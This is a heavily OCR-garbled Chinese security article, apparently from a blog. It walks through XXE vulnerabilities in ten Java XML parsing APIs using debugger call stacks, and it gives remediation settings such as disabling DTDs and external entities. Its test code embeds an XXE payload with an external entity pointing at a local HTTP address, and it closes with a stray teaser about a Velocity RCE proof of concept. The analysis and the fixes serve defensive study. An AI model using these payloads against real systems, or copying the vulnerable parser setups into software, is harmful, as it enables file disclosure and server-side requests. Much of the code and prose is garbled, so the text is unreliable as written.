fLastSectionWasCharacterData = f 
)//if we dont need to coalesce clear the buffer 
elsei 
fContentBuffer.clear(); 
} 
fUsebuffer = true ; 
//take care of character reference 
if (fEntityScanner.skipChar( 8B '#')) { 
scanCharReferenceValue(fContentBuffer, SEB null); 
fMarkupDepth--; 
if (!fIsCoalesce){ 
setScannerState( P 
return XMLEvent. H 


nce & coalesce is not true 


在 SCANNER STATE REFERENCE 这 个 case 中 ， 会 调用 scanEntityReference 来 处 理 
fContentBuffer 中 的 数据 。 跟 进 scanEntityReference 方法 ， 首 先 会 获取 scanName ， 我 人 
payload 里 面 的 name 自 然 是 xxe， 所 以 这 里 debug 的 结果 也 是 xxe。 


protected void scanEntityReference(XMLStringBuffer content) throws IOException, XNIException { content: " 
String name = fEntityScanner.scanName(); 


reportFatalError( Gamma 'NameRequiredInReference", MEB null) 
return; 


代码 继续 下 行 ， 来 到 下 图 位 置 ， 调 用 XMLEntityManager#startEntity 进行 处 理 。 


//we are starting the entity even if the entity was not declared 
//if that was the case it its taken care in XMLEntityManager.startEntity() 
//we immediately call the endEntity. Application gets to know if there was 


Vf AERE Erate (SCANNER. STATE_CONTENT) ; 
//return true ; 





gni KMLEntityManager#startentity 最 后 会 调用 startEntity(String name,XMLInputSource 
miinputsource, boolean literal, boolean isExternal) 这 个 构造 方法 ， 并 且 可 以 看 到 已 经 
x 
Wit payload E97 aS HEAL 








= Variables 


this = 


entity = (Er 
Ñ external true 
He externalEnt { 


andedSystemid = "http://127.0.0,1:8888" 
® size = 0 





# startEntity 方法 中 调用 了 setupCurrentEntity 方法 。 


A or | i startEntity(String name, 
XMLInputSource xmlInputSource, 
a || flastsecti P n literal, boolean isExternal) 
s IOException, XNIException { 


tring encoding = i ; 
expansion Limit is set by the Application, we need to 
the entity expansion Limit ‘set by the parser, if number of entity 


eds the entity expansion limit, parser will throw fatal error. 
at this represents the nesting level of open entities. 


这 里 可 以 看 到 解析 了 我 们 payload 中 的 地 址 ， 并 





XMLEntityManager#setupCurrentEntity , 
E 了 http 的 请 求 。 


stream = connect. getInputStream(); 


at any I 
















setupCurrentEntity:646, XMLEntityManager (com.sun.org.apache.xerces.i 
startEntity:1300, XMLEntityManager (com.sun.org.apache.xerces.intern 
startEntity:1237, XMLEntityManager (com.sun.org.apache.xerces.interr 
ScanEntityReference:1908, XMLDocumentFragmentScannerImpl (com.sun.o 





next:3067, XMLDocumentFragmentScannerlImpl$FragmentContentDriver (com 
next:606, XMLDocumentScannerImpl (com.sun.org.apache.xerces.internal.imp]) 
scanDocument:510, XMLDocumentFragmentScannerImpl (com.sun.org.apache.xercegs 
parse:848, XML11Configuration (com.sun.org.apache.xerces.internal.parsers) 
parse:777, XML1i1Configuration (com.sun.org.apache.xerces.internal.parsers) 
parse:141, XMLParser (com.sun.org.apache.xerces,internal.parsers) 
parse:243, DOMParser (com.sun.org.apache.xerces,internal.parsers) 
parse:348, DocumentBuilderImpl (com.sun.org.apache.xerces.internal.jaxp) 
parse:121, DocumentBuilder (javax.xml.parsers) 

main:19, DocumentXXE (com.link3r.xxe.javaxxe) 


代码 流程 图 


lot kept ion, ONIÉxception 《 


& nenti «s lob«ception, XNIException ( iai ? oro We 
ton (fScannerState! 4 
a Teu Attanagerii 
urityPropertyfticager we nit 


RI 


Wifi LOL Inpursouree source? wi XNIExcept ion, 1OExceptin’ 


new errot 各 3689 
“PUKOOS parse may not be called white parsing."); 


ption, XNiException { 


错误 的 修复 方式 


目前 百度 查询 xxe 的 修复 方式 实际 上 有 这 么 一 段 代 码 ， 但 是 这 么 一 段 代码 实际 上 是 不 会 生效 。 






es. internay i 
Shnal. impl) 
arnal, impl) 


parsers) 





0x03 XXE 漏 洞 修复 与 防御 


使 用 开发 语言 共 的 禁用 外 部 实体 的 方法 


PHP 


i ibxml_disable_entity_Loader(true); 





JAVA 


socumeriuina Beare dbf Da。 ZOCRNSUODO 
dbf .setExpandEntityReferences(false); 





Python 


n lxml import etree 
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve entities-False)) 





看 看 为 啥 不 起 作用 ， 可 以 选择 在 dbf. setExpandEntityReferences(false); 下 一 个 断 点 。 
DocumentBuilderFactoryImpl 这 个 类 中 的 expandEntityRef 变量 的 值 默 认 是 true， 通 
Ù setExpandentityReferences(false) 之 后 将 expandEntityRef 变量 的 值 设置 为 false。 


void main(String[] args) throws Exception { args: {} 
T: cunentBui lderFactory dbf - DocumentBuilderFactory. (让 dbf: 
> ://apache.org/xml/features/disallow-doctype-decl", t 
/xml.org/sax/features/external-general-entities' 
/xm, org/sax/features/external-paramet 


doef 
"<IENTITY | xxe SYSTEM X"http://127.0.0. 
b "]><doc>&xxe;</doc>"; 
putStream is = new ByteArrayInputStream(str.getBytes()); 
ument doc = db.parse(is); 


888V"»An" + 


DocumentBuilder newDocumentBuilder() 
ParserConfigurationException 


ck that if a Schema has been specified that neither of the schema properties have been set. */ 
grammar t= null && attributes != null) ( « ar 1 
‘attributes. containsKey(JAXPConstants. Dt 
Y n&w- ParserConfigurationException( 
SAXMessageFormatter. fo; ssage( GEB null, 
QE "schema-already-specified", new Object[] {JAXPConstants. 


f (attributes; containskey(JAXPConstants. nt 
row new ParserConfigurationException( 

SAXMessageFormatter. formatMessage( GED null, 

GD "schena-siready-specitied", new Object[] (JAXPConstants. 
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而 在 DocumentBuilderFactoryImpl 这 个 对 象 中 ， 会 根据 刚刚 的 expandEntityRef 的 值 取 反 之 
赋值 给 CREATE_ENTITY_REF_ NODES FEATURE, 也 就 
是 http://apache.org/xml/features/dom/create-entity-ref-nodes ， 对 应 的 结果 为 trues 


domParser.setFeature( 


> % value = 


eae mana 


最 后 这 里 处 理 完 之 后 自然 返回 DocumentBuilderFactorylmpl 对 象 ， 代 码 继续 下 行 来 到 parse 处 ， 


publi ; DocumentXXE { 
atic void main(String[] args) throws Exception { 
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); 
//dbf .setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 
//dbf.setFeature("htt /xml.org/sax/features/external-general-entities”, false); 
//dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 
dbf.setExpandEntityReferences( false); 
DocumentBuilder db - dbf.newDocumentBuilder(); 
String str = "<!DOCTYPE doc [ An" + 
"<!ENTITY xxe SYSTEM \"http://127.@.@.1:8888\">\n" + 
*)><doc>ixxe;</doc>"; 
Input i yInputStream(str.getBytes()); 
[Document ， is); 


pw 





he 


前 面 步骤 省 略 ， 和 之 前 一 致 ， 来 到 XMLParser#parse 这 里 之 后 ， 这 里 有 个 reset 方法 。 


SB OMLInputSource inputSource) 
ANIEXCep tion, pog { 
r is called directl initialize them 


securityManage i 
securityManager = XMLSecurityManager( GRRE t cue); 
fConfiguration. setProperty{Constants. , securityManager); 


(securityPropertyManager 1 
securityPropertyManager SecurityPropertyManager(); 
fConfiguration.setProperty(Constants. , SecurityPropertyManager) ; 





跟 进 这 个 reset 方法 ， 实 际 上 来 到 了 AbstractDOMParser£reset 中 ， 并 且 将 
PES uA eigo 的 值 设 置 为 我 们 刚刚 修改 过 ， 也 就 是 true 这 个 值 。 


public void reset () throws XNIException { 
super.reset (); 


// get feature state 
| fCreateEntityRefNodes = fCreateentityRetNodes: true 
| fConfiguratio abi ha CN RE NOES E 


Japache.org/xml/features /dom/create-ehtity- 


PE EM R rr 


这 是 到 这 部 分 的 调用 栈 


parse:140, XMLParser (com.sun.org.apache.xerces.internal.parsers) 
parse:243, DOMParser (com.sun.org.apache.xerces.internal.parsers) 
parse:348, DocumentBuilderimpl (com.sun.org.apache.xerces.internal Jaxp) 


parse:121, DocumentBuilder (avax:xml. parsers) 
main:20, DocumentXXE (com.l1nk3r.xxe.jaVaxxe) i 
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EREE Fit 在 XMLDocumentFragmentScannerImpl#scanDocument 方法 中 ,会 先 扫描 
document 部 分 ， 再 扫描 DTD 部 分 ， 最 后 扫描 ELEMENT 部 分 。 
tragmentScannerimpl#next 会 针对 & 进行 标记 ， 调 用 scanEntityReference 方 
法 将 fscannerState 设置 为 SCANNER STATE REFERENCE ， 最 后 依然 会 调用 


setupCurrentEntity 创建 连接 并 发 起 请 求 ， 以 获取 外 部 实体 的 内 容 。 


ef AUTH 


的 结果 为 true 





mea PERE! XMLEntityManager#endEntity ， 经 过 一 系列 调用 会 来 

gj AbstractDOMParser#endGeneralentity 中 ， 会 判断 前 面 设置 的 fCreateEntityRefNodes 的 
(&, MRA true 则 展开 实体 引用 到 生成 的 文档 中 替换 掉 &xxx 的 实体 引用 声明 ， 设 置 为 false 则 保留 
更 全 引 用 声明 的 DOM 树 在 生成 的 文档 中 。 





fCurrentNodeIndex 
fDeferredDocumentImpl.getParentNode (fCurrentNodeIndex, 
$ f . 
eateEntityRefNodes 
children of entity ref before the entity ref. 
// remove entity ref. 


, XMLEntityManager | 
+, XMLEntityScanner (cc 
, XMLEntityScanner ( 


Nagen@b35 


ILDocumentFragmentScannerlmpl$FragmentContentDriver 

DocumentScannerlmpl (com.sun. í ces.in 
510, XMLDocumentFragmentScannerlmpl (co: 

L11Configuration (con 

L11Configuration (co 

LParser (c r : 

MParser (com.sun.o che.xerces.internal.parser: 


cumentBuilderlmpl (com.st 'g-apache,xerces 
DocumentBuilder (javax.xml.parsers) 
1:2( , Ps 
20, DocumentXXE (com:l1nk3r.xxe.javaxxe) 







DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); 

/* 以 下 为 修复 代码 */ //https://www.owasp.org/index.php/XML_Externa 
// 禁 用 DTDs (doctypes), 几乎 可 以 防御 所 有 xml1 实 体 攻 击 
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true 
// 如 果 不 能 禁用 DTDs, 可 以 使 用 下 两 项 ， 必 须 两 项 同时 存在 
dbf.setFeature("http://xml.org/sax/features/external-general-entities", fal 
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", f 
/* 以 上 为 修复 代码 */ 

DocumentBuilder db = dbf.newDocumentBuilder(); 
Document doc = db.parse(request.getInputStream()); 


当然 如 果 还 不 放心 的 话 ， 下 面 是 owasp 推 荐 的 ， 其 实 也 就 是 多 了 三 个 属性 的 设置 ， 具 体 可 以 看 看 
面 


DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); 
String FEATURE = null; 
try { 
FEATURE = "http://apache.org/xml/features/disallow-doctype-deci 
dbf.setFeature(FEATURE, true); 


FEATURE = "http://xml.org/sax/features/exter 
dbf.setFeature(FEATURE, 





FEATURE = “http://xml.or 





2i. synal ont i1 ts 
x/ fea € xternal-parame 6 nt ; 

dbf.setFeature(FEATURE, false); 

FEATURE = "http://apache.org/xml/features/nonvalidating/load-exte 


dbf.setFeature(FEATURE, false); 
dbf .setXIncludeAware(false); 


dbf.setExpandEntityReferences(false); 


DocumentBuilder safebuilder = dbf.newDocumentBuilder( ); 


当然 还 是 需要 看 一 下 原理 ， 选 择 在 下 面 这 个 位 置 代码 下 个 断 点 。 


dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) 
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可 以 看 看 下 





再 错误 修复 亡 半 里面 ， 在 dbf.setExpandEntityReferences(false); 的 时 候 ， 我 们 知 
DocumentBuilderlmpl 类 中 ， 调 用 domParser.setFeature 将 expandEntityRef 取 反 之 后 
J&CREATE ENTITY REF NODES_FEATURE， 之 后 调用 reset 方法 的 时 候 将 


值 yE 
p fNodes 的 设置 为 CREATE_ENTITY_REF_NODES_FEATURE 的 结 


fcreateEntityRe 
回 到 现在 这 个 设置 ， 有 点 不 太一 样 ， 在 DocumentBuilderlmpl 类 中 找 不 到 我 们 设置 的 这 

^ Mw doctype decl 的 配置 ， 因 此 会 继续 向 下 ， 下 图 是 在 DocumentBuilderlmpl 中 第 
734(7, iA setFeatures 方法 。 


tSchemaValidationManager 
yparsedEnt ityHandler =n 
emaValidatorComponentManager 





APARRA FT, KET XMLDocumentScannerimpl#setFeature 中 ， 并 且 将 
fDisallowDoctype 设置 为 true ， 这 是 整个 setFeature 操作 过 程 中 的 调用 链 。 


Parser 
cumentBuilderimpl 
imentBuilderlmpl (co 
imentBuilderlmpl { 
DocumentBuilderFactorylmpl (co 
mentXXE (co: 





REAA 3) XMLDocumentFragmentScannerlmpl#scanDocument ， 我 们 知道 首先 会 扫 
f document 部 分 ， 然 后 调用 XMLDocumentScannerlmplSPrologDriver£next 方法 。 


stem.out.println("here in after calling next"); 
(event!-XMLStreamConstants. && complete); 





f£ XMLDocumentScannerimpl$PrologDriver#next 方法 中 ， 调 用 setScannerState 将 
"SeannerState 设置 为 24， 也 就 是 SCANNER. STATE DOCTYPE 属性 。 


ntity entity = 


= n y: 
if(entity instanceof Entity.ScannedEntity){ 
fStartPos=( (Entity. ScannedEntity) entity) . position; 


y 
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protected final void setScannerState(int state) { state: 24 


RAR 


See 
System. .print("### setScannerState: "); 
//System. out. print(fScannerState) ; 

System. | .print(getScannerStateName(state)); 
System.  .printlin(); 
} 


紧 接 着 代码 继续 下 行 ， 根 据 fScannerState 进行 选择 ， 这 里 我 们 前 面 的 fScannerState 的 状态 j 
置 为 了 SCANNER_STATE_DOCTYPE ， 所 以 自然 进入 这 个 case 中 ， 然 后 针对 我 们 之 前 的 
fDisallowDoctype 属性 进行 判断 ， 如 果 是 true 的 话 ， 就 抛 出 异常 。 


h( fScannerState) { 
RR 
//this part is handled by FragmentContentHandler 
case SCANNER STATE ROOT ELEMENT: { 
//we have read ‘<' and beginning of reading the start element tag 
setScannerState (SCANNER STATE START ELEMENT TAG); 
setDriver(fContentDriver); 
//ftrom now onwards this would be handled by fContentDriver,in the same next(》 cati 
return fContentDriver.next(); 


:+ 
//this function fills the data,. 
scanComment ( ) ; 
setScannerState( y; 
return XMLEvent. H 
//setScannerState(SCANNER_STATE_PROLOG) ; 
//break; 


fContentBuffer.clear() ; 
scanPI(fContentBuffer); 
setScannerState( 

return XMLEvent. 


Oe TN | 


DERT 
repo rtFata/ scro "( CE "DoctypeNotALlowed’, RSH 


| true | 


这 是 到 这 个 部 分 的 调用 栈 。 


next:919, XMLDocumentScannerlmpl$PrologDriver (com.sun.org.apache.xerces.internal.impl) 
next:606, XMLDocumentScannerlmpl (com.sun.org.apache.xerces.internal.impl) 
scanDocument:510, XMLDocumentFragmentScannerlmpl (com.sun.org.apache.xerces.internal.imp! 
parse:848, XML11Configuration (com.sun.org.apache.xerces.internal.parsers) 
parse:777, XML11Configuration (com.sun.org.apache.xerces.internal.parsers) 
parse:141, XMLParser (com.sun.org.apache.xerces.internal.parsers) 
parse:243, DOMParser (com.sun.org.apache.xerces.internal.parsers) 
parse:348, DocumentBuilderlmpl (com.sun.org.apache.xerces.internal.jaxp) 
parse:121, DocumentBuilder (javax.xml.parsers) 

| main:20, DocumentXXE (com./ 1nk3r.xxe.javaxxe) 


最 后 终止 部 分 的 调用 栈 。 





oseReaders() { 
actually does nothing, readers are closed in the nc 
the current entity. 
seems to have happened during the jdk6 development with the 


p ,ceReaders: 


ser 
mentBuilderlmpl ( 
,cumentBuilder 
DocumentXXE 





2.SAXBuilder 


测试 代码 : 













mport java.io.ByteArrayInputStream; 
Dort java.io.InputStream; 

mport org.jdom2.Document;d 

Mport org.jdom2.input.SAXBuilder; 





Bublic stat oi { 


string str = di 
+ 
; 
InputStream is = ByteArrayInputStream(str.getBytes()); 
SAXBuilder sb = SAXBuilder(); 


Document doc = sb.build(is); 


有 这 不 方 法 到 触发 xxe 的 调用 栈 ， 可 以 看 到 画 圈 的 部 分 和 我 们 前 面 分析 的 DocumentBuilder 中 
HW e 的 调用 栈 基 本 相似 ， 最 后 都 是 到 XMLEntityManager#setupCurrentEntity 中 触发 xxe。 
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setupCurrentEntity:619, XMLEntityManager 

startEntity: 1300, XMLEntityManager í 

startEntity:1237, XMLEntityManager ( rg.aps 
scanEntityReference:1908, XMLDocumentFragmentScannerimpl 
next:3067, XMLDocumentFragmentScannerimpl$FragmentContentE 
next:606, XMLDocumentScannerlmpl (com.sun 

next:117, XMLNSDocumentScannerlmpl (coi 

scanDocument:510, XMLDocumentFragmentScannerimpl 
parse:848, XML11Configuration (com.su 

parse:777, XML11Configuration ( on Dac é à 
(parse: 141, XMLParser com.. sun. org. ‘apach xerces. internal. parsers) 


b 


build:217, SAXBuilderEngine (0 
build:253, SAXBuilderEngine 
build: 1091, SAXBuilder 
main:15, SAXBuilderXxe í 





修复 建议 
修复 建议 可 以 参考 下 列 代码 ， 注 意 实例 化 SAXBuilder 类 和 build 方法 解析 之 间 的 这 些 属性 。 


SAXBuilder sb = SAXBuilder(); 
sb.setFeature( , Q 
sb.setFeature( if 


sb.setFeature( 3 
sb,setFeature( rna 
Document doc - sb.build(is); 


可 以 看 到 实际 上 将 disallow-doctype-decl 设置 为 true 之 后 ， 就 会 抛 出 以 下 报错 ， 具 体 原因 


和 DocumentBuilder 一 致 。 


0bjc143719]: Class Sevataunche per 1 is DN in both SE Tbrary/ avaf Serai rean vochines /jon. 8.8_48. Pec ries em dab esa goat pe and /Library/Java/ NSW rtu Ma 


Exception in thread "main" org, jdom2.input.JOOMParseException: Error on line 1: 将 功能 “ , d LEES Lu 
at org. 3don2. input, sax. SAXBui iderEngine. buildt SAXBui lder£ngine. java:232) 





3.SAXParserFactory | 
原理 分 析 E 
测试 代码 : 


D 

















package com. link3r.xxe.javaxxe; 


ort org. xml.sax.HandlerBase; 
import 
import 
import 
import 


java.io.ByteArrayInputStream; 
java.io.InputStream, 
javax.xml.parsers.SAXParser; 
javax.xml.parsers.SAXParserFactory; 


public cl { 
publi { 
String str = + 


InputStream is = ByteArrayInputStream(str.getBytes()); 
SAXParserFactory spf - SAXParserFactory.newInstance(); 
SAXParser parser - spf.newSAXParser(); 

parser.parse(is, (HandlerBase) 35 





, XMLEntityManager (co j 
'eference: 1908, XMLDocumentFragmentScannerlmpl (corr 
XMLDocumentFragmentScannerimpl$FragmentContentDriver (cc 





Configuration 
arser (c 
tractSAXParser (com.sun.org.apache.x 
XParserimpi$JAXPSAXParser (com:sun.org 
AXParserimpl (com.sun.org.apache.xerces.internal.jaxp) 
: xm. parsers) 
SAXParseFactoryXxe (com.link3r.xxe.javaxxe) 





SAXParserFactory spf = SAXParserFactory.newInstance(); 
Spf.setFeature( 

Spf.setFeature( 

Spf.setFeature( 

Spf.setFeature( 

SAXParser parser - spf.newSAXParser(); 
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4.SAXTransformerFactory 
漏洞 原理 
测试 代码 : 
com.link3r.xxe.javaxxe; 
javax.xml.transform.sax.SAXTransformerFactory; 
javax.xml.transform.stream.StreamSource; 


java.io.ByteArrayInputStream; 
java.io.InputStream; 


String str - + 


, 


InputStream is - ByteArrayInputStream(str.getBytes()); 














SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory 


StreamSource source - StreamSource(is); 
sf.newTransformerHandler(source); 


startEntity:1300, XMLEntityManager (c 

startEntity:1237, XMLEntityManager 

scanEntityReference: 1908, XM ocumentemoment ca nt 
next:3067, XMLDocumentFragmentScannerlmpl$FragmentContentDrive 
next:606, XMLDocumentScannerimp!l (c 

next:117, XMLNSDocumentScannerlmpl . 

scanDocument:510, XMLDocumentFragmentScannerimpl K 
parse:848, XML11Configuration { 

parse:777, XML11Configuration | 

parse:141, XMLParser (com. | 

parse:1213, AbstractSAXParser (com.s 

parse:649, Ss arsar C ( 

parse:430, Parser (com. t xalan.interna 

parse:505, Parser (com.sun.org.apache.xalan.internal 
compile:410, XSLTC (com.sun.org.apache int 
compile:512, XSLTC (com.sun.c i 


(Sit. trax) 
al.xsitc.trax) | 
che.xalan.intemal.xsltc 







~~ * t * 


ransformerFactory sf - (SAXTransformerFactory) SAXTransformerFactory 
setAttribute(XMLConstants.ACCESS EXTERNAL, DTD, DS 


StreamSource source = new StreamSource(is); 










a 


' com. 1ink3r.xxe. javaxxe; 


java.io.ByteArrayInputStream; 
java.io.InputStream; 
)rg.dom4j .io.SAXReader; 


Blass SAXReaderXxe { 

de static void : | throws Exception { 
String str = "«!DOCTYPE doc [ \n" + 

, "EIENTITY xxe SY 
"]»«doc»&xxe; «/doc»" ; 
nputStream is = new ByteArrayInputStream(str.getBytes()); 
Reader saxReader = new SAXReader ( ) ; 

xReader . read(is); 
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1300, XMLEntityManager 
startEntity:1237, XMLEntityManager (c: pache 
scanEntityReference: 1908, XMLDocumentFragmentScannerimpl (com 
next: , XMLDocumentFragmentScannerimpl$FragmentContentDriver 
next:606, XMLDocumentScannerimpl « f 
next:117, XMLNSDocumentScannerimp! 


scanDocument:510, XMLDocumentFragmentScannerimpi 

parse:848, XML11Configuration 

parse:777, XML eae t 

parse:141, XML Parser (c un.org.ap 

parse: 1213, AbstractSAXParser (com.s org.apache T parse 
parse:649, iles cuts ure rd 2m.sun.org.apache.xerces.intemal.jaxp) 
read:465, SAXReader (org n 

read:343, SAXReader ( ic 

main:14, SAXReaderXxe (c 


修复 建议 





SAXReader saxReader = SAXReader(); 
saxReader .setFeature( , ED 用 
saxReader.setFeature( , : im 


saxReader.setFeature( 
saxReader.setFeature( nal 
saxReader.read(is); 


6.XML Reader 


漏洞 原理 
测试 代码 : 





















package com.link3r.xxe.javaxxe; 


import org.xml.sax.InputSource; 
import org.xml.sax.XMLReader; 


import org.xml.sax.helpers.XMLReaderFactory; 


import java.io.ByteArrayInputStream; 
“import java.io.InputStream; 


"public cla 1 
publi { 
String str = + 


InputStream is = ByteArrayInputStream(str.getBytes()) 
XMLReader reader = XMLReaderFactory.createXMLReader( ); 
reader .parse( 





InputSource(is)); 


entScannerimpl 
cumentFragmentScannerimpl 
ration 


nriguration 


ractSAXP; 


X«MLReaderXxe 









peader reader = XMLReaderFactory.createXMLReader( ) ; 

IssetFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 

ISetFeature("http: //apache.org/xml/features/nonvalidating/load-external-dt 

"SetFeature("http: //xml.org/sax/features/external-general-entities", false 

4 SetFeature("http: //xml.org/sax/features/external-parameter-entities", fal 
Parse(new InputSource(is)); 


dd 


E 


&maFactory 
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漏洞 原理 
测试 代码 : 


com. Llink3r.xxe. javaxxe; 


javax.xml.transform.stream.StreamSource; 
javax.xml.validation.Schema; 
javax.xml.validation.SchemaFactory; 
java.io.ByteArrayInputStream; 
java.io.InputStream; 


String str - 


ByteArrayInputStream(str.getBytes()); 
SchemaFactory factory - SchemaFactory.newInstance( 
StreamSource source - StreamSource(is); 


InputStream is - 


Schema schema - factory.newSchema(source); 


entFragmentScannerimpi ( 
mentScannerimpi$FragmentContentDriver 1 
annerimpi 
entScannerimpl g.apa 
0, XMLDocumentFragmentScannerimpi (con 
maParsingConfig 
parse:685, SchemaParsingConfig (c 
parse:530, SchemaDOMParser (< 1n.Org 
getSchemaDocument:2175, XSDHandler (co 
parseSchema:573, XSDHandler ( „Si 
loadSchema:617, XMLSchemaLoader (co 
loadGrammar:575, XMLSchemaLoader (c 
loadGrammar:541, XMLSchemaLoader (cc 
newSchema:255, XMLSchemaFactory. ( 
newSchema:638, SchemaFactory 
main:17, SchemaFactoryXxe (cor 


ces .intemal.impl 
xerces intemal.j. 


修复 建议 
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- * } " 













E actory factory - SchemaFactory.newInstance("http://www.w3.org/2001/XMLSct 
pry. setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, ""); 
ory.setProperty(XMLConstants.ACCESS EXTERNAL SCHEMA, pur 

nsource source - new StreamSource(is); 
schema = factory.newSchema(source); 


ge com.link3r.xxe.javaxxe; 


t javax.xml.stream.XMLInputFactory; 
t javax.xml.stream.XMLStreamConstants; 
£ javax.xml.stream.XMLStreamReader; 


| class XMLIny { 
Ec static void 
_ XMLInputFactory xmlInputFactory - XMLInputFactory.newFactory(); 
_ XMLStreamReader reader = xmlInputFactory.createXMLStreamReader(ResourceL 
etry { 
while (reader.hasNext()) { 

int type = reader.next(); 

if (type == XMLStreamConstants.START_ELEMENT) { 

System.out.print(reader.getName()); 
} else if (type == XMLStreamConstants.CHARACTERS) { 


throws Exception { 


System.out.printin("type" + type); 
} else if (type == XMLStreamConstants.END ELEMENT) { 


System, out.printin(reader.getName()); 


} 
reader .close(); 
Catch (Exception e) { 
e.printStackTrace(); 
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com. 1ink3r.xxe. javaxxe; 


java.io.InputStream; 


{ 


ResourceUtils.class.getClassLoader().getResourceAsStream( 


vm 


调用 栈 : 


kes 


startEntity:1300, XMLEntityManager & 
startEntity:1237, XMLEntityManager 


scanEntityReference: 1908, XMLDocumentFragmentScannerlmpl 


7, XMLDocumentFragmentScannerimpi$FragmentContentDriver 


umentScannerimpl ( 
ntScannerimpl « 
ne XMiStreamReaderimp! ( 
main:15, XMLInputFactoryXxe (con 


修复 建议 





XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory(); 
xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); 
xmlInputFactory.setProperty(XMLInputFactory.IS SUPPORTING EXTERNAL ENTITIES, f& 
XMLStreamReader reader = xmlInputFactory.createXMLStreamReader(ResourceUtils.ge 


9. TransformerFactory 


漏洞 原理 
测试 代码 : 
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ackage com. 1link3r.xxe. javaxxe; 
package 


javax.xml.transform.TransformerFactory; 
javax.xml.transform.dom.DOMResult; 


import 
import 
import 
import 
import 


javax.xml.transform.stream.StreamSource; 
java.io.ByteArrayInputStream; 
java.io.InputStream; 


public cla { 
public st: { 
String str = + 


/ 
InputStream is = ByteArrayInputStream(str.getBytes()); 
TransformerFactory tf = TransformerFactory.newInstance(); 
StreamSource source = StreamSource(is); 
tf.newTransformer().transform(source, DOMResult()); 


EntityManager 
1908 


»>cumentScannerimpl ( 


, XMLDocumentFragmentScannerimpl (com.sun.org.apache.xerces.internal,impl) 
.onfiguration ( sun.org.apa s.internal.parse 
nfiguration ( 


SAXParser (coms apac > nternal.par: 
ansformerlmpl :sumorg.apache.xalan.internal.xsitc.trax) 


ansformerFactoryXxe 





WSformerractory tf = TransformerFactory.newInstance(); 
; tibute(xML Constants .ACCESS_EXTERNAL_DTD, m 
pACtribute(xmiconstants. ACCESS. EXTERNAL STYLESHEET, '"'"); 
Qurce source = StreamSource(is); 


r 
ansformer() .transform(source, DOMResult()); 


10.Validator 

漏洞 原理 

测试 代码 : 
com.link3r.xxe.javaxxe; 


javax.xml.transform.stream.StreamSource; 
javax.xml.validation.Schema; 
javax.xml.validation.SchemaFactory; 
javax.xml.validation.Validator; 
java.io.ByteArrayInputStream; 
java.io.InputStream; 


String str = + 


InputStream is = ByteArrayInputStream(str.getBytes()); 
SchemaFactory factory = SchemaFactory.newInstance( 

Schema schema = factory.newSchema(); 

Validator validator = schema.newValidator(); 

StreamSource source = StreamSource(is); 
Validator.validate(source); 


调用 栈 : 


StartEntity:1300, XMLEntityManager 

startEntity:1237, XMLEntityManager (c 

scanEntityReference:1908, WinAtiGcuruenteragiientscannerimp! ( 
next:3067, OE Porman eee Diss ragientCantento river 
next:606, XMLDocumentScannerimpl ( pac ) 
next:117, CP epoculTientican n amp (c 


parse:777, XML11Configuration (com.sun.orc 
validate:155, StreamValidatorHelper (com. su 
validate:116, Validatorimpl (com.sun.org.apa 
validate:124, Validator (javax.xml.validation) 

main:20, ValidatorSampleXxe (com.11nk3r.xxe.javaxxe) 





修复 建议 
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in: schema - factory.newSchema(); i | E 
idator validator = schema.newValidator(); 

idator .setProperty(XMLConstants.ACCESS EXTERNAL DTD, '"'"); 
ddator.setProperty(XMLConstants.ACCESS EXTERNAL. SCHEMA, uy 

1 Source source = new StreamSource(is); 

Jator.validate(source); 


inmarshaller 


cage com. link3r.xxe.javaxxe; 


rt javax.xml.bind.JAXBContext; 
irt javax.xml.bind.Unmarshaller; 


Miblic static void throws Exception ( 
Class tClass - UnmarshallerXxe.class; 

JAXBContext context - JAXBContext.newInstance(tClass); 
Unmarshaller um - context.createUnmarshaller(); 

Object o = um.unmarshal(ResourceUtils.getPoci()); 
tclass.cast(o); 


的 解析 方法 不 会 存在 xxe 问题 ， 这 也 是 唯一 一 个 使 用 默认 的 解析 方法 不 会 存在 XXE 的 一 


J BAS, Ri\ts FA Unmarshaller 来 处 理 xml 不 会 发 生 xxe 的 问题 。 我 们 可 以 看 到 调用 
> 存在 xxe 问 题 的 库 或 者 类 实际 上 最 后 底层 调用 都 是 jdk 自 身 处 理 xml 的 类 ， 最 后 的 核心 触 
RE XMLEntityManager#setupCurrentEntity 当中 。 


式 实际 上 也 是 两 种 : 
Setfeature 的 方式 来 防御 xxE ， 主 要 几 个 配置 项 如 下 所 示 ; 


Apache .org/xm1/features/disallow-doctype-decl", true 

Pache .org/xml/features/nonvalidat ing/load-external-dtd", false 
m1. org/sax/features/external-general-entities", false 

m2. Org/sax/features/external-parameter-entities", false 


过 修改 XMLConstants 这 个 类 的 一 些 配置 来 进行 修复 : 
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XMLConstants. ACCESS EXTERNAL DTD, un 9 
XMLConstants.ACCESS EXTERNAL STYLESHEET, "" 







实际 上 通常 禁用 DTD， 就 ok 了 。 但 是 由 于 一 些 实际 业务 情况 ， 无 法 禁用 DTD， 这 时 候 建议 禁用 
实体 和 参数 实体 一 起 配置 ， 因 为 禁用 了 通用 实体 就 不 会 被 回 显 ， 禁 用 了 参数 实体 就 不 会 被 外 带 
询 。 


当然 xml 配 置 中 还 有 很 多 宛 余 部 分 ， 具 体 可 以 看 看 前 文 DocumentBuilder 中 正确 修复 方式 中 的 
官方 给 的 配置 。 


最 后 当然 再 提 一 个 小 建议 ， 修 复 XXE 建 议 采取 最 小 化 原则 。 如 果 一 股 脑 将 这 些 参 数 全 部 禁用 或 
制 ， 可 能 会 出 现 一 些 奇 怪 的 bug。 
Reference 


we 


': Prevention Cheat Sheet£Java) 
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*» 


Velocity 模板 远程 代码 复 现 及 利用 指南 、 


[ 安全 研究 员 S00pY 在 GitHub 发 布 了 Apache Solr Velocity 模版 注入 远程 命令 执行 的 poc。 
